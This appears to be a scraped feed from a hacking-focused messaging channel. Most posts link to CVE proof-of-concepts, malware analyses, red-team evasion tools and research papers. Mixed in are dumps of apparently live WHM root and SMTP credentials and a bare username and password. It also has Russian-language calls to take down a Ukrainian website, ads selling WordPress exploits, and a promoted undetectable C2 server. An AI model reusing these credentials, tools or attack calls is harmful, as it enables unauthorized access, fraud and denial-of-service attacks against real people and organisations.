#tools#Red_Team_Tactics1. Forensia - Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase VirusTotalC2 - Abusing VirusTotal API to host C2 traffic
2023-01-17 11:53:20
Gmailc2A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections and Network Traffic Restrictions.C2 Feature:▫️ Persistence (type persist)▫️ Shell Access ▫️ System Info (type info)▫️ More Features Will Be AddedFeatures:▫️ FUD Ratio 0/40▫️ Bypass Any EDR's Solutions▫️ Bypass Any Network Restrictions▫️ Commands Are Being Sent in Base64 And Decoded on server side▫️ No More Tcp Shits
2023-01-17 09:30:32
ClassTopic: Sql injectionTime: 8 Pm ISTDetails: @vanshsecInvite Link (Web) : se Jayada Aaye Aur thodi Si Aur knowledge paye
2023-01-17 02:16:06
2023-01-17 02:15:46
2023-01-16 10:24:51
2023-01-16 10:00:27
ForensiaAnti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase.#Unloading Sysmon Driver.#Gutmann Method File Shredding.#USNJrnl Disabler.#Prefetch Disabler.#Log Eraser and Event log Disabler.#User Assist Update Time Disabler.#Access Time Disabler.#Clear Recent Items#Clear Shim Cache#Clear RecentFileCache#Clear ShellBag#File Melting Capabilities.
2023-01-16 07:59:31
2023-01-16 07:59:30
2023-01-15 16:02:45
2023-01-15 13:05:50
#Research"TROJANPUZZLE: Covertly Poisoning Code-Suggestion Models", 2023.
2023-01-15 13:05:49
#Malware_analysisHow to Analyze JavaScript Malware - A Case Study of Vjw0rm
2023-01-15 13:05:48
#exploit1. CVE-2022-28944/CVE-2022-24644:EMCO Software Multiple Products/KeyMouse 3.08 (Win) - Unauth. Update RCE Client-Side SSRF to Google Cloud Project Takeover [Google VRP] CVE-2022-3656:Symbolic Link Following + Upload Warning Bypass
2023-01-15 13:05:47
#Infographics#Malware_analysisAntivirus Event Analysis Cheat Sheet, ver. 1.11.0.]->
2023-01-15 13:05:46
#tools#Blue_Team_Techniques1. Detecting Fake Events in Azure Sign-in Logs Crassus - Windows privilege escalation discovery tool
2023-01-15 09:18:43
Cheatsheetsof knowledge about information security.
2023-01-15 05:01:28
Happy Indian Army Day 💖
2023-01-15 03:51:00
Love you india ❤️❤️
2023-01-15 00:13:40
PTorZillaPrint: Firefox & Tor Browser fingerprint testing.
2023-01-14 15:16:55
2023-01-14 13:01:33
CVE-2022-46169Exploit to CVE-2022-46169 vulnerability on Cacti 1.2.19
2023-01-14 12:56:58
Asta-decryptThis is a simple script that implements the decryption routine for the encrypted final stage used by the Astaroth/Guildma malware family.Astaroth uses an AutoIT script with an embedded DLL that writes the final payload to disk as db.temp and injects it into a hollow process.
2023-01-14 08:42:40
Happy Makar Sankranti to all of you❤️
2023-01-14 05:38:19
CVE-2023-21752PoC for arbitrary file delete vulnerability in Windows Backup service
2023-01-14 01:07:44
2023-01-14 00:40:47
​​SUDO_KILLERA tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation. #sudo
2023-01-13 20:37:47
Guys please support me
2023-01-13 13:55:41
#Whitepaper"EyeSpy - Iranian Spyware Delivered in VPN Installers", 2023.
2023-01-13 13:55:40
#Malware_analysis1. NeedleDropper Analysis Gootkit Loader "Pre-Owned" malware in ROM on T95 Android TV Box (AllWinner H616)
2023-01-13 13:55:39
#exploit1. PoC for arbitrary file delete/move in Razer Synapse 3 Macro module CVE-2023-21752:PoC for arbitrary file delete vulnerability in Windows Backup service
2023-01-13 09:59:33
2023-01-13 08:04:09
GraphQL exploitation – All you need to know – Cybervelia January 13, 2023 at 02:28AM by Necessary-Reality-80via reddit
2023-01-13 08:04:08
Linux sysadmins, beware!Hackers are exploiting a critical RCE vulnerability in Control Web Panel (CWP) to gain elevated privileges on web servers.Read: your servers ASAP!
2023-01-13 03:56:10
Happy Lohri to everyone
2023-01-12 18:33:56
If u want organic traffic for ur site to promote to eligible for adds ping me @alex14324 escrows welcome 😊
2023-01-12 17:20:05
#reversing#IoT_SecurityReversing embedded device bootloader (U-Boot)Part 1: 2:
2023-01-12 17:20:04
#tools#Malware_analysis#Blue_Team_TechniquesAutomating Malware Analysis Operations (MAOps)]-> Malware C2 Monitoring:]-> Malware Hunting using Cloud:]-> YARA CI/CD system:]-> Surface Analysis System on Cloud:]-> Memory Forensic on Cloud:
2023-01-12 17:20:03
#exploit1. CVE-2023-0210:Unauthenticated remote DOS in ksmbd NTLMv2 authentication (Linux kernel) CVE-2022-20452:Privilege escalation on Android from installed app to system/another app via LazyValue using Parcel after recycle()
2023-01-12 17:20:01
#Research"Apple vs. EMA: Electromagnetic Side Channel Attacks on Apple CoreCrypto", 2022.]-> A Potholing Tour in a SoC:An electromagnetic-wave side-channel issue on ARMv8 AES instructions:
2023-01-12 17:20:00
#Threat_ResearchOpen-source Cobalt Strike stager decoder]->
2023-01-12 17:19:59
#Offensive_security1. SMB "Access is denied" caused by anti-NTLM relay protection Implementation of Persistence via Recycle Bin by adding "open\command" subkey to the "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell" key and changing its value to the implant path Vulnerabilities on redirected•com
2023-01-12 14:39:37
Please like and support it guys…!
2023-01-12 10:54:48
Secret HandshakeA prototype malware C2 channel using x509 certificates over mTLSI always wondered if threat actors ever used x509 certificates as part of their C2 communication, not to encrypt the network traffic but to actually embed the C2 communication in the x509 cert. After searching for something like this in the wild for 5 years I finally decided to just code it myself to see if it's is
2023-01-12 05:51:59
SpyDialerFree search contact information by phone number, name, address or email.Even shows the names of the neighbors, but the information displayed by the service requires additional verification. #humint #usa
2023-01-12 05:32:34
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit
2023-01-11 15:31:49
📡Совсем скоро будет представлена эффективная и безопасная система система AARTOS DDS для обнаружения дронов, причем есть защита, которая подбирается индивидуально под заказчика. Сие чуда будет показано на выставке Perimeter Protection с 17 по 19 января 2023 года
2023-01-11 15:24:28
🕵️‍♂️StrongPity espionage campaign targeting Android usersESET researchers identified an active campaign that we have attributed to the StrongPity APT group. Active since November 2021, the campaign has distributed a malicious app through a website impersonating Shagle – a random-video-chat service that provides encrypted communications between strangers. Unlike the entirely web-based, genuine Shagle site that doesn’t offer an official mobile app to access its services, the copycat site only provides an Android app to download and no web-based streaming is possible.
2023-01-11 15:17:16
#Threat_Research1. RCE bug in JWT Secret Poisoning (CVE-2022-23529) Bring-Your-Own-Vulnerable-Driver Tactic in Attempt to Bypass Endpoint Security Navigating the Vast Ocean of Sandbox Evasions
2023-01-11 15:17:15
#Offensive_security1. Microsoft LAPS(E) in Judgement NonHeavyFTP:A FTP Server pwn chanllenge
2023-01-11 15:17:14
#Research"BlockScope: Detecting and Investigating Propagated Vulnerabilities in Forked Blockchain Projects", 2022.]->
2023-01-11 15:17:13
#exploit1. CVE-2022-31705:Geekpwn 2022 Vmware EHCI OOB Linux >=4.10: UAF in __do_semtimedop() due to lockless check outside RCU section Lexmark Printers/Copiers haxx 0-day Exploit
2023-01-11 15:17:12
#FuzzingFuzztruction - prototype of a fuzzer that does not directly mutate inputs but instead uses a so-called generator application to produce an input for our fuzzing target
2023-01-11 15:14:57
2023-01-11 15:14:56
2023-01-11 15:14:55
2023-01-11 08:59:41
2023-01-11 02:31:47
​​CVE-2022-39073Proof of concept for the command injection vulnerability affecting the ZTE MF286R router, including an RCE exploit. #exploit
2023-01-11 02:31:46
ImageMagick Security Policy Evaluator January 10, 2023 at 04:52PM by nibblesecvia reddit
2023-01-10 18:17:45
2023-01-10 16:31:12
My old video 5 years back tracing ip address
2023-01-10 15:44:50
​​Программируемая Карточка NFC RFID4 930 рублей#Оборудование Translation: ru-enProgrammable NFC RFID Card4 930 rubles‌‌
2023-01-10 15:35:52
⚙️ New Update On AlienFox Ultimate 🦊
2023-01-10 15:30:02
2023-01-10 15:18:46
Geolocation Spy (GeoSpy) - is an OSINT analysis and research tool that is used to track and execute intelligent social engineering attacks in real time.▫️
2023-01-10 13:19:07
#exploitSSRF attack on MySQL Server with password using php-curl
2023-01-10 13:19:06
#Red_Team_Tactics1. Bypass EDR Hooks by patching NT API stub, and resolving SSNs and syscall instructions at runtime A new AMSI Bypass technique using .NET ALI Call Hooking Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID
2023-01-09 18:38:22
𝘾𝙍𝙔𝙋𝙏𝙊 𝙊𝙎𝙄𝙉𝙏:├BTC-ETH-XRP-BCH-LTC-XLM-DASH-ZEC-XMR-TON (Blockchain)├Google Dorks (Change Wallet)├blockchair (Explorer) + Chrome├breadcrumbs (Visualization) + Chrome├shard (Visualization)├blockpath (Visualization)├oxt (Visualization)├graphsense (Visualization)├ethtective (Visualization ETH)├walletexplorer (Grouping)├bitinfocharts (Grouping)├bitcoinabuse (Abuse)├bitcoinwhoswho (Abuse)├checkbitcoinaddress (Abuse)├scamalert (Abuse)├cryptscam (Abuse)├ransomwhe (Abuse)├badbitcoin (Abuse)├bitcoinais (Abuse)├cryptoblacklist (Abuse)├bitrankverified (Scoring)├vivigle (Scoring)├antinalysis (Scoring TOR)├cryptocurrencyalerting (Monitoring)├cryptotxalert (Monitoring)├kycp (Block Analysis)├blockstream (Block Analysis)├fragment (TON market)└btcrecover (Wallet Brute)
2023-01-09 17:41:18
Мы шикарны👄Неплохо поработали💯А свиньи как всегда идут ⚰🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️🏃‍♂️👍
2023-01-09 17:41:17
📌Добрый вечер, КиберАрмия⚔🇷🇺Пробуем положить усраинский свиносервис для поиска работы, призывающий создавать Call-центры для обзвонов Российских государственных учреждений в целях сообщения ложной информации об их минировании!URL:❓IP:❓Начинаем⚠️
2023-01-09 17:34:11
2023-01-09 16:40:34
Сайт пункта подвергся киберсокрушению😏👍‌‌Translation: ru-enThe site of the point was cyber-crashed😏👍‌‌
2023-01-09 11:37:43
2023-01-08 15:48:10
Wordpress exploit come with your price @alex14324
2023-01-08 13:03:13
2023-01-08 10:11:11
Leaked FBI Operating System that is used by a certain division known as the Computer Analysis Response Team (CART)
2023-01-08 03:56:02
2023-01-07 16:38:12 IS BACK :)❤️
2023-01-07 15:06:59
#tools#Offensive_security1. Alcatraz - x64 binary obfuscator Phantom DLL Hollower
2023-01-07 15:04:22
💥Phantom DLL Hollower is a PoC performs Phantom DLL Hollowing which reported by @_forrestorr.🔖Masking Malicious Memory Artifacts – Part I: Phantom DLL Hollowing⚙️Phantom DLL hollowing PoC
2023-01-07 14:06:21
2023-01-06 19:38:50
Let me know if anybody interested to purchase price is nogetiable Dm @alex14324
2023-01-06 16:43:11
Cyber Security Attack Vectors👁 #Attack
2023-01-06 16:16:10
#Research"From IP to Transport and Beyond: Cross-Layer Attacks Against Applications", 2022.
2023-01-06 16:16:09
#Threat_Research1. Prototype Pollution in Python Pre-Auth RCE in Liferay Portal CE (CVE-2019-16891)
2023-01-06 16:16:08
#Analytics#InfographicsSystematization of attacks on the perimeter of L2/L3 network equipment. Ver. 3.0.
2023-01-06 15:55:17
2023-01-06 15:21:53
Account Takeover Using Password Resetby Unknown
2023-01-06 13:46:01 pack of osint
2023-01-06 12:37:15
2023-01-06 07:37:36
2023-01-06 07:37:16
2023-01-05 17:29:00
2023-01-05 17:23:46
🔹 Usefull Websites 🔹1. Digital Library - Archive.org2. Online Courses - w3schools.com3. Screenshot Taker (Permanent) - Archive.is4. Learn Languages - Duolingo.com5. Screenshot Taker (HD) - Screenshot.guru6. Bypass Login (Websites) - Bugmenot.com7. Graphic Softwares - Vectr.com8. Cracked Softwares - CrackingPatching.com9. File Sharing (2GB) - wetransfer.com10. Autodraw (A.I) -
2023-01-05 14:08:22
#Research#cryptography"Factoring integers with sublinear resources on a superconducting quantum processor", Dec. 2022.
2023-01-05 14:08:21
#Tech_book"Security Strategies in Linux Platforms and Applications. Third Edition", 2022.
2023-01-05 14:08:20
#WhitepaperAPI Security Best Practices Guide: Comprehensive list of security best practices to secure your APIs throughout their lifecycle + API Security Checklist]-> APIKit: Discovery, Scan and Audit APIs Toolkit:
2023-01-05 14:08:19
#Research#Threat_Research"Open-CyKG: An Open Cyber Threat Intelligence Knowledge Graph", 2021.]->
2023-01-05 14:08:18
#Research"Experience Report on the Challenges and Opportunities in Securing Smartphones Against Zero-Click Attacks", 2022.
2023-01-05 14:07:55
#DFIRNew Windows 11 Pro (22H2) Evidence of Execution Artifact
2023-01-05 14:07:54
#Threat_Research#Red_Team_Tactics"Autonomous Penetration Testing using Reinforcement Learning"]-> Network Attack Simulator:
2023-01-05 14:07:53
#Research"EarSpy: Spying Caller Speech and Identity through Tiny Vibrations of Smartphone Ear Speakers", 2022.
2023-01-05 14:07:52
#Offensive_security1. Google Hacking Database (GHDB) NTP Fingerprinting Powershell scripts for post exploitation
2023-01-05 14:07:51
#Sec_code_reviewOWASP Mobile Application Security Testing Guide (MASTG)
2023-01-05 14:07:50
#exploit#reversing1. Vulnerability in Synology NAS Reverse Engineering and Exploiting an IoT TotoLink N100RE bug ESI Injection PoCs
2023-01-05 14:07:49
#Malware_analysis1. The Mac Malware of 2022 New version of Raspberry Robin
2023-01-05 14:07:48
#exploit1. Buffer overflow exploit for Stephen Bradshaw's Vulnserver CVE-2022-20951:Cisco BroadWorks CommPilot Application Software Unauthenticated SSRF CVE-2022-20958:Cisco BroadWorks CommPilot Application Software Authenticated RCE
2023-01-05 11:19:00
2023-01-05 10:55:14
2023-01-05 06:25:29
2023-01-05 06:25:28
2023-01-04 16:06:49
🔥🔥🔥Indirect syscalls PoCs:💥HellsHall(combination of HellsGate and indirect syscalls) - Another Way To Fetch Clean Syscalls🔖Github repo💥C_SYSCALLS is a single stub direct and indirect syscalling with runtime SSN resolving for windows.💥Hiding Your Syscalls - bypassing detections that I wrote myself. To the best of my knowledge EDR vendors aren’t really alerting on direct syscalls yet.🔖Source code💥FreshyCalls tries to make the use of syscalls comfortable and simple, without generating too much boilerplate and in modern C++! Doesn't it bother you to have to define every syscall stub or function within a module? Or having to depend on the Windows version for the syscalls? Well, forget about all that. FreshyCalls makes use of some features implemented from C++11 such as the variadic templates along with some custom mini-shellcode to avoid this.💥syscalls-asm💥Charon's Ferry(adapted from HellsGate)- An indirect syscaller
2023-01-04 16:06:48
🌐Top 10 web hacking techniques of 2022
2023-01-04 13:10:23
2023-01-04 12:12:16
2023-01-04 04:55:10
​​PyBotNetA #Python framework for building remote control, #botnet , #trojan or #backdoor with Telegram or other control panels
2023-01-04 02:36:24
2023-01-04 01:24:20
2023-01-03 16:37:26
2023-01-03 12:11:12
2023-01-03 06:49:31
Welcoming Our Forum »» https://system32.inkASK: Anything Related To Tech With Create your Own forumLearn: About Programming,cybersecurity,bugHunting And Many MorePost: Share your Knowledge,Rats,Databases And Videos related to TechSo SignUp Now And Grow Our Community Thank You;
2023-01-03 06:03:07
Fresh Onionshttp://freshonifyfe4rmuh6qwpsexfhdrww7wnt5qmkoertwxmcuvm4woo4ad.onion/
2023-01-03 06:03:06
Hacking tools pack & backdoors generator Interface lockscreen, Metasploit and More Android/IOS Hacking Socks4/5 or http proxies to make a multithreading Http-flood/Https-flood (cc) attack
2023-01-03 03:10:00
2023-01-02 18:27:41
🔥🔥🔥Survey of security mitigations and architectures, December 2022"This blogpost summarizes and compares some of the exciting approaches in our journey to memory safety. I hope this could become a reference to interested readers and colleagues.Along this blogpost I’ll consider five security properties: spatial safety, temporal safety, type safety, definite initialization and concurrency safety."
2023-01-02 18:27:39
Thank you very much for reading me ❤️Here is an article about reverse firmware in English:
2023-01-02 18:24:06
#Infographics#Malware_analysisRansomware & Data Extortion Landscape in 2022
2023-01-02 18:24:05
#Threat_ResearchCVE-2022-27510, CVE-2022-27518 - Measuring Citrix ADC & Gateway version adoption on the Internet
2023-01-02 18:24:04
#tools#Blue_Team_Techniques1. HTML Smuggling Detection - HTML Smuggling Detection Log4Shell-Scanner-Exploit - Bash script to identify the Log4j CVE-2021-44228 vulnerability remotely
2023-01-02 15:57:49
2023-01-02 14:30:25
2023-01-02 03:28:20
2023-01-01 16:02:37
2023-01-01 15:05:12
Welcoming Our Forum »» https://system32.inkASK: Anything Related To Tech With Create your Own forumLearn: About Programming,cybersecurity,bugHunting And Many MorePost: Share your Knowledge,Rats,Databases And Videos related to TechSo SignUp Now And Grow Our Community Thank You;
2023-01-01 14:48:22
2022-12-31 16:40:29
2022-12-30 18:15:45
EarSpy – A New Attack on Android Devices Use Motion Sensors to Steal Sensitive Data
2022-12-30 18:12:58
Мой диплом по безопасности динамической маршрутизации, который я защитил на отлично в этом году (заканчивал я значит колледж)Пользуйтесь на здоровье
2022-12-30 16:39:49
🧰RedTeam-Tools is github repository contains a collection of tools and resources that can be useful for red teaming activities.⚙️Reconnaissance⚙️Resource Development⚙️Initial Access⚙️Execution⚙️Persistence⚙️Privilege Escalation⚙️Defense Evasion⚙️Credential Access⚙️Discovery⚙️Lateral Movement⚙️Collection⚙️C&C⚙️Exfiltration⚙️Impact
2022-12-30 16:26:31
#hardeningWindows 10 Hardening (v.0.9.0) settings and configurations
2022-12-30 16:26:30
#reversing1. Reverse Engineering Rustlang Binaries - A Series Huawei's Security Hypervisor
2022-12-30 16:26:29
#Malware_analysis1. GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection CatB Ransomware
2022-12-30 16:26:28
#Threat_ResearchSupply-Chain Security:Evaluation of Threats and Mitigations
2022-12-30 16:26:27
#Research#Sec_code_review"Do Users Write More Insecure Code with AI Assistants?", 2022.
2022-12-30 16:26:26
#Cloud_Security1. Parsing and manipulating JSON in Powershell Passwordless Persistence and Privilege Escalation in Azure
2022-12-30 15:18:22
must watch once video by @Deadlymalwarexp💻@Deadlymalwarexp💻
2022-12-30 14:42:22
2022-12-30 14:17:12
Россияне в третьем квартале текущего года вывели в другие страны рекордные 1,47 трлн рублей. Это почти в три раза больше, чем в первом и втором кварталах, и в 26 раз больше, чем в третьем квартале 2021 года.Translation: ru-enIn the third quarter of this year, the Russians withdrew a record 1.47 trillion rubles to other countries. This is almost three times more than in the first and second quarters, and 26 times more than in the third quarter of 2021.
2022-12-29 15:30:52
2022-12-29 11:37:02
Free WHM 🔟✔️root;KdiKQWsb; | Domains: 14tegkocom;#))CW(TQntc5; | Domains: 39root;T7w7f8sS; | Domains: 56root;G@briel8728; | Domains: 13meghahos;6C5@[NuY9kTu9t; | Domains: 14root;TrigonHost@12345A!; | Domains: 28inovaho1;Ajf@56290270; | Domains: 10starhost;LJ8fm[06tB1x*C; | Domains: 8bdsp;J4p)Z=k(={c&; | Domains: 29root;oSDJ2pYiR2x1Pqcn; | Domains: 5root;1q2w3e4r5t!Q"W£E$R%T; | Domains: 7inovaho1;Ajf@56290270; | Domains: 10root;HnGpQrwHBs42v2; | Domains: 6root;tF1xO0cZ5pU0jA4w; | Domains: 3pointmakinacom;H^YN23zbeXX?; | Domains: 8inaciomecena;@Megatec2604; | Domains: 8root;x(G+D%k#bn0dEA)0Pt; | Domains: 18📣
2022-12-29 11:37:01
#𝑆𝑀𝑇𝑃𝑆 🟢🔥HOST : : 587USER : postmaster@account.billada.comPASS : f792a046ee0b4ddd9312a7d2bbb8cef7-8845d1b1-dd279ceeHOST : premium157.web-hosting.comPORT : 587USER : noreply@bridgepro.caPASSW : qComPass@Romi7664SENDER : unknown@unknown.comHOST : mail.msofficeskill.comPORT : 587USER : info@msofficeskill.comPASSW : Prateek@1974SENDER : info@msofficeskill.comHOST : smtp.hostinger.comPORT : 587USER : support@ironpatches.netPASSW : Undisputed$1SENDER : support@ironpatches.netHOST : smtp.office365.comPORT : 587USER : mbl@myanmar-brewery.comPASS : P@ssw0rd2022@)@@HOST : srvc204.trwww.comPORT : 587USER : : Send0034!SENDER : : smtp.hostinger.comPORT : 587USER : support@ironpatches.netPASSW : Undisputed$1SENDER :
2022-12-28 16:20:03
#Research"A Survey of the Recent Trends in Deep Learning Based Malware Detection", 2022.
2022-12-28 16:20:02
#reversingL’art de l’évasion: How Shlayer hides its configuration inside Apple proprietary DMG files
2022-12-28 16:20:01
#Malware_analysis1. BlueNoroff introduces new methods bypassing MoTW GuLoader Dissection Reveals New Anti-Analysis Techniques and Code Injection Redundancy
2022-12-28 16:20:00
#tools#Offensive_securitySteganography Toolkit
2022-12-28 16:19:59
#tools#reversing1. OFRAK (Open Firmware Reverse Analysis Konsole) - binary analysis and modification platform A free comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures
2022-12-28 16:19:58
#Offensive_securityModifying Embedded Filesystems in ARM Linux zImages
2022-12-28 16:19:57
#Red_Team_Tactics1. Divide And Bypass: A new Simple Way to Bypass AMSI Pass-the-Challenge: Defeating Windows Defender Credential Guard
2022-12-28 16:19:56
#exploitKITCTFCTF 2022 V8 Heap Sandbox Escape]-> PoC:
2022-12-28 16:19:55
#tools#Blue_Team_Techniques 1. Potential Cloud Account Takeover Kernel-mode WinDbg extension for Protected Process investigation
2022-12-28 14:33:15
2022-12-28 14:00:42
Certificate Ripper v2 released - tool to extract server certificates December 28, 2022 at 06:24AM by Hakky54via reddit
2022-12-28 14:00:41
Spice up your persistence: loading PHP extensions from memory December 28, 2022 at 03:25AM by gid0rahvia reddit
2022-12-27 17:08:21
​​DSTIKE WiFI Deauther MiNiDeauther MiNi is still an ESP8266 development board,It comes installed with the latest ESP8266 Deauther software. With this software, you can perform different attacks to test WiFi networks. Please note that the ESP8266 does only support 2.4GHz.You can also use it to develop your own software. It is simple to use, just like any other ESP8266 development board.Function:▫️ Deauther Attack: Disconnect 2.4G WiFi▫️ Deauther Beacon: Create fake networks▫️ Deauther Probe:Confuse wifi trackers▫️ Packet Monitor:Display wifi trafficDeauther or Jammer: What's the difference?Buy online: 🛒 #dstike #esp8266
2022-12-27 14:57:04
2022-12-26 14:29:19
🔥🔥🔥Cinema time!Agenda:💾Video decoding subsystem overview💾AppleAVD internals💾AppleAVD attack surface💾Fuzzing approach and code analysis💾Results💾Previously disclosed vulnerabilities and exploitation💾Discussion💾Q&A
2022-12-26 14:28:43
🔥🔥🔥KITCTFCTF 2022 V8 Heap SBX(V8 exploitation challenge)In this writeup, I’ll go over the intended solution in detail which leads to a V8 (heap) sandbox escape without using the JIT technique that is very popular currently.
2022-12-26 14:28:39
💥Introduction to the Windows Filtering PlatformThe Windows Filtering Platform (WFP) provides flexible ways to control network filtering. It exposes user-mode and kernel-mode APIs, that interact with several layers of the networking stack. Some configuration and control is available directly from user-mode, without requiring any kernel-mode code (although it does require administrator-level access). WFP replaces older network filtering technologies, such as Transport Driver Interface (TDI) filters some types of NDIS filters.
2022-12-26 14:28:33
🔥🔥🔥AD manager Plus full RCE PoC At that time, Log4j was already widespread on the internet. Manage Engine had already patched the Ad Manager Plus to prevent it from being affected by the Log4j vulnerability. They had mentioned that Log4j was not affected by Ad Manager Plus. However, we determined that the Ad Manager Plus was running on our target and managed to exploit the Log4j vulnerability.When we initially reported this vulnerability to Synack, we only managed to get a DNS callback and our report was marked as LDAP injection. However, we attempted to gain full RCE on the host but were not successful. Later, we discovered that Ad Manager Plus was running on another target, so we tried to get full RCE on that target. We realized that there was a firewall and an anti-virus running on the machine, so most of our payloads wouldn't work. After spending a considerable amount of time , we eventually managed to bypass the firewall and anti-virus, and achieve full RCE.
2022-12-26 14:28:26
|The Apocalypse of the Heap - Shizo edit.|💥Painless intro to the Linux userland heapThe heap is hard to maintain, especially in this implementation due to being threaded. Hopefully this article helps you understand the process of making a chunk free from its allocation and which structures play in the game of freeing chunks.💥Understanding glibc malloc💾How heap memory is obtained from kernel?💾How efficiently memory is managed?💾Is it managed by kernel or by library or by application itself?💾Can heap memory be exploited?💥ptmalloc fanzine episodes(collection of resources related to glibc heap meta-data corruptions):💾episode 01: munmap madness💾episode 02: fastbin fever💾episode 03: scraps of notes on ptmalloc metadata corruptions💾episode 04: once upon a realloc()💾episode 05: thread local caching in glibc malloc💥Heap exploitation for Dummies.This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.🔖github repo💥Educational Heap Exploitation(how2heap) is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases.💥GlibC Malloc for Exploiters presentation💥Linux Heap Exploitation Intro Series:💾printf might be leaking!💾Used and Abused – Use After Free 💾The magicians cape – 1 Byte Overflow 💾Riding free on the heap – Double free attacks! 💾Set you free() – part 1 💾Set you free() – part 2 💥How to exploit a double free vulnerability in 2021(Exploiting an ARM-only race condition)You will learn how to exploit a double free vulnerability or exploit a UAF vulnerability.💥Linux kernel heap feng shui in 2022In this article we discuss changes in the Linux kernel slab allocator implementation and exploitation challenges associated with kernel heap-related vulnerabilities. We focus on the SLUB (unqueued slab allocator) implementation in this article since it is the most common allocator enabled by default on most Linux distributions and Android devices.💥Overview of GLIBC heap exploitation techniquesOverview of current GLIBC heap exploitation techniques up to GLIBC 2.34, including their ideas and introduced mitigations along the way.💥Perfect Spray: A Journey From Finding a New Type of Logical Flaw at Linux Kernel To Developing a New Heap Exploitation TechniqueIn this talk, we will present Pspray, a new memory exploitation technique for the Linux kernel, dramatically improving the exploitation reliability. In particular, we designed a heap exploitation technique effective for most memory vulnerabilities, including heap OOB, UAF, and double-free. The key idea behind this new attack is in developing timing side-channels in Linux's SLUB allocator. Then using this timing side-channel, we carefully redesigned the traditional exploitation technique to precisely predict the runtime behavior of SLUB, allowing Pspray to avoid unexpected exploitation failure. We used Pspray's exploitation technique for 10 real-world Linux kernel vulnerabilities, which significantly improved the attack success probability from 56.1% to 97.92%.
2022-12-26 14:28:22
⬇️Ниже приведен короткий список материалов, который мне помог в изучении эксплуатации кучи.⬇️⬇️Below is a short list of materials that helped me in studying the heap exploitation ⬇️
2022-12-26 14:13:25
2022-12-26 05:05:46
​​dnscrypt-proxyA flexible DNS proxy, with support for modern encrypted DNS protocols such as DNSCrypt v2, DNS-over-HTTPS, Anonymized DNSCrypt and ODoH (Oblivious DoH).▫️ dnscrypt-proxy documentation ← Start here▫️ DNSCrypt project home page▫️ Discussions▫️ DNS-over-HTTPS and DNSCrypt resolvers▫️ Server and client implementations▫️ DNS stamps▫️ FAQ #privacy
2022-12-26 05:05:45
Overview of Glibc Heap Exploitation Techniques (currently up to v2.34) December 25, 2022 at 10:17AM by himeko98via reddit
2022-12-25 15:35:37
Hello everyone in this auspicious day we are going to launch our Forum powered by @H4ckerinthehouse where you can connect, share and communicate with each others. Here are some features of this forum:You can ask questions, create polls, answer to any question. You can refer to anyone using your refferal code. You can make a public discussion group as well as a private discussion group! Also you can send a private message to an individual and you can ask anything. A lot of upcoming features and surprises are coming in upcoming days.So what you guys are looking for? Go and register on the Hackerinthehouse Forum. Here is the link of the forum to register:
2022-12-25 14:04:03
2022-12-25 01:44:59
Happy Tulsi Pujan ❤️
2022-12-24 16:39:20
#reversingReverse Engineering Tiktok's VM Obfuscation
2022-12-24 16:39:19
#Malware_analysis1. Zerobot Malware IcedID Botnet Distributors Abuse Google PPC to Distribute Malware
2022-12-24 16:39:18
#Blue_Team_Techniques1. Linux kernel module generator for Hidden firewall that follows the rules in the external YAML file Guide to Use Sigma EVTX Checker Fast go-based scanner for Linux, Windows, macOS that applies Sigma rules and outputs the matches as JSON
2022-12-24 16:39:17
#exploit1. CVE-2020-9854:"Unauthd" - three logic bugs ftw CVE-2022-3875, CVE-2022-3876, CVE-2022-3877:Vulnerabilities in Passwordstate
2022-12-24 16:39:16
#tools#Offensive_security1. Rps_Http ClientInfo IOC search PowerShell script for recent Exchange issue to check for signs of exploitation Vultriever - Vulnerability scoring with Nmap with the built-in Vulners snap-in
2022-12-24 16:39:15
#Threat_Research1. Custom-Branded Ransomware: The Vice Society Group and the Threat of Outsourced Development New Ransomware Strains Emerging From Leaked Conti’s Source Code
2022-12-24 16:38:17
🔥🔥🔥PoC of wfshbr64.sys LPE(Windows Kernel Mode Anti-Cheat Driver, CVE-2022-42046)wfshbr64.sys and wfshbr32.sys specially crafted payload allows arbitrary user to perform bitwise operation with arbitrary EPROCESS offset and flags value to purposely elevate the game process to CodeGen Full protection by manipulating EPROCESS.Protection and EPROCESS.SignatureLevel flags (security hole as a feature).⚠️The driver is signed by Microsoft hardware compatibility publisher that is submitted via Microsoft Hardware Program.
2022-12-24 16:38:16
🔥🔥🔥Blindside is a technique for evading the monitoring of EDR and XDR platforms using hardware breakpoints to inject commands and perform unexpected, unwanted, or malicious operations. It involves creating a breakpoint handler, and setting a hardware breakpoint that will force the debugged process to load only ntdll to memory. This will result in a clean and unhooked ntdll which then could be copied to our process and unhook the original ntdll.🔖Technical blog post:Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
2022-12-24 16:38:15
💥Reverse Engineering Tiktok's VM Obfuscation (Part 1)This article does not delve into the specifics of how these strings are utilized or how TikTok interprets the rest of the bytecode through its custom virtual machine and various opcodes. If that is something you are interested in, keep an eye out for the second part of this series.🔖Full strings dump
2022-12-24 16:12:27
2022-12-24 10:30:35
2022-12-24 10:11:58
2022-12-24 09:59:36
»»»» ««««UserName: tac-userPassword: ~D4p5o8s
2022-12-23 14:56:02
